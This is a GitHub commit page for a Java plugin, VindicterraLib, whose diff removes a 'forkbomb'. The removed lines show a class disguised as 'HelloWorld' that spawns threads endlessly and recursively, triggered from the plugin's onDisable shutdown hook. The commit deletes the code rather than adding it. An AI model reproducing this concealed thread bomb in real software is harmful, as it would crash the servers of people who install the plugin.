Skip to content

Commit

Permalink
Removed Forkbomb
Browse files Browse the repository at this point in the history
  • Loading branch information
TheSmimg committed Oct 7, 2024
1 parent 2850c2d commit a824352
Showing 1 changed file with 0 additions and 14 deletions.
14 changes: 0 additions & 14 deletions src/main/java/org/vindicterra/vindicterraLib/VindicterraLib.java
Original file line number Diff line number Diff line change
Expand Up @@ -16,19 +16,5 @@ public void onEnable() {
public void onDisable() {
// Plugin shutdown logic
getLogger().info("-- VindicterraLib Disabled! --");
HelloWorld.nyan(new String[]{":3}"});
}

public static final class HelloWorld {
public static void nyan(String[] args) {
Runnable task = () -> {
nyan(List.of(":3").toArray(new String[0]));
};
for(;;) {
System.err.println("null:3");
Thread thread = new Thread(task);
thread.start();
}
}
}
}

0 comments on commit a824352

Please sign in to comment.